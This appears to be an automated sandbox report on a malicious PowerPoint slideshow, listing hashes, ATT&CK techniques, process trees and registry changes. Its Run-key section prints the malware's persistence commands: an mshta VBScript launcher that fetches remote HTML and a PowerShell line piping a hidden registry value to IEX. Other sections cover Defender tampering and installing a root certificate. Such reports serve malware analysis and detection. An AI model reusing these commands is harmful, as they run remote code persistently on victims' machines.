9161bc0ac7fd107278182e5220134b057915525c78ef256713b9ef6a4ccab4b6

Analysis

max time kernel
84s
max time network
118s
platform
windows7_x64
resource
win7v20201028
submitted
15-03-2021 08:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9161bc0ac7fd107278182e5220134b057915525c78ef256713b9ef6a4ccab4b6.pps
Size

83KB
MD5

43d6c3f16b3af2b31f6db8cf8702b5c8
SHA1

51a1010f9b54cb916474d288694a8255809f7843
SHA256

9161bc0ac7fd107278182e5220134b057915525c78ef256713b9ef6a4ccab4b6
SHA512

20a5cbb63445b08e08f9cc03152a2577f4e8a7f19d899c0aaac4450199305529c1d9cacacb8193b863d4d7c278dee2e32a1ee9083dccb39fb0bee42476e4238f

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Users\Public\bin.vbs	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 13 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

MsHTa.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1332	292	MsHTa.exe	POWERPNT.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2384	2092	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2424	2092	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2504	2092	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2556	2092	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2608	2092	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2684	2092	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2736	2092	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2812	2092	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2864	2092	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2956	2092	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1676	2092	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1956	2092	powershell.exe

Blocklisted process makes network request 11 IoCs

Processes:

MsHTa.exeWScript.exe

flow	pid	process
6	1332	MsHTa.exe
8	1332	MsHTa.exe
10	1332	MsHTa.exe
12	1332	MsHTa.exe
13	1332	MsHTa.exe
15	1332	MsHTa.exe
16	1332	MsHTa.exe
18	1332	MsHTa.exe
21	1812	WScript.exe
23	1812	WScript.exe
25	1812	WScript.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

MsHTa.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%[email protected]/p/277.html\"\", 0 : window.close\")"	MsHTa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%[email protected]/p/277.html\"\", 0 : window.close\")"	MsHTa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%[email protected]/p/277.html\"\", 0 : window.close\")"	MsHTa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).btfee)\|IEX\"\", 0 : window.close\")"	MsHTa.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run	MsHTa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)\|IEX\"\", 0 : window.close\")"	MsHTa.exe

Drops file in System32 directory 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

772 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1572 taskkill.exe
2036 taskkill.exe

pid	process
772	schtasks.exe

pid	process
1572	taskkill.exe
2036	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 10 IoCs

adware spyware

Modify Registry

T1112

Processes:

POWERPNT.EXEMsHTa.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	MsHTa.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	POWERPNT.EXE

Modifies registry class 64 IoCs

Processes:

POWERPNT.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493478-5A91-11CF-8700-00AA0060263B}\ = "FreeformBuilder"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493486-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6B-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6F-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "LegendEntries"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E559-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493451-5A91-11CF-8700-00AA0060263B}\ = "_Global"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347E-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493493-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F2-5A91-11CF-8700-00AA0060263B}\ = "CustomLayouts"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A58-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A62-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493461-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F5-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F9-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F9-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6C-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493476-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493492-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C7-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D6-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E0-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E559-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493459-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493474-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349A-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CE-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E3-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E556-4FF5-48F4-8215-5505F990966F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493462-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347D-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D4-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DB-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E1-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A68-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493457-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E6-5A91-11CF-8700-00AA0060263B}\ = "ColorEffect"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A50-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CF-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DA-5A91-11CF-8700-00AA0060263B}\ = "DiagramNodes"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EB-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F0-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A52-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7C-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E558-4FF5-48F4-8215-5505F990966F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493460-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493461-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493472-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348B-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C4-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A59-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346F-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493477-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EF-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F9-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A56-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "ChartBorder"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6E-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493468-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348E-5A91-11CF-8700-00AA0060263B}\ = "PlaySettings"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A65-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348B-5A91-11CF-8700-00AA0060263B}\ = "AnimationSettings"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A59-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5D-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A63-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "DataTable"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A67-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e309000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	WScript.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

292 POWERPNT.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

936 powershell.exe
968 powershell.exe
968 powershell.exe
936 powershell.exe

pid	process
292	POWERPNT.EXE

pid	process
936	powershell.exe
968	powershell.exe
968	powershell.exe
936	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	2036	taskkill.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

POWERPNT.EXE

pid process

292 POWERPNT.EXE

pid	process
292	POWERPNT.EXE

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

POWERPNT.EXEMsHTa.execmd.exeWScript.exeWScript.exe

description	pid	process	target process
PID 292 wrote to memory of 1976	292	POWERPNT.EXE	splwow64.exe
PID 292 wrote to memory of 1976	292	POWERPNT.EXE	splwow64.exe
PID 292 wrote to memory of 1976	292	POWERPNT.EXE	splwow64.exe
PID 292 wrote to memory of 1976	292	POWERPNT.EXE	splwow64.exe
PID 292 wrote to memory of 1332	292	POWERPNT.EXE	MsHTa.exe
PID 292 wrote to memory of 1332	292	POWERPNT.EXE	MsHTa.exe
PID 292 wrote to memory of 1332	292	POWERPNT.EXE	MsHTa.exe
PID 292 wrote to memory of 1332	292	POWERPNT.EXE	MsHTa.exe
PID 1332 wrote to memory of 2016	1332	MsHTa.exe	cmd.exe
PID 1332 wrote to memory of 2016	1332	MsHTa.exe	cmd.exe
PID 1332 wrote to memory of 2016	1332	MsHTa.exe	cmd.exe
PID 1332 wrote to memory of 2016	1332	MsHTa.exe	cmd.exe
PID 1332 wrote to memory of 772	1332	MsHTa.exe	schtasks.exe
PID 1332 wrote to memory of 772	1332	MsHTa.exe	schtasks.exe
PID 1332 wrote to memory of 772	1332	MsHTa.exe	schtasks.exe
PID 1332 wrote to memory of 772	1332	MsHTa.exe	schtasks.exe
PID 1332 wrote to memory of 968	1332	MsHTa.exe	powershell.exe
PID 1332 wrote to memory of 968	1332	MsHTa.exe	powershell.exe
PID 1332 wrote to memory of 968	1332	MsHTa.exe	powershell.exe
PID 1332 wrote to memory of 968	1332	MsHTa.exe	powershell.exe
PID 1332 wrote to memory of 936	1332	MsHTa.exe	powershell.exe
PID 1332 wrote to memory of 936	1332	MsHTa.exe	powershell.exe
PID 1332 wrote to memory of 936	1332	MsHTa.exe	powershell.exe
PID 1332 wrote to memory of 936	1332	MsHTa.exe	powershell.exe
PID 1332 wrote to memory of 2036	1332	MsHTa.exe	taskkill.exe
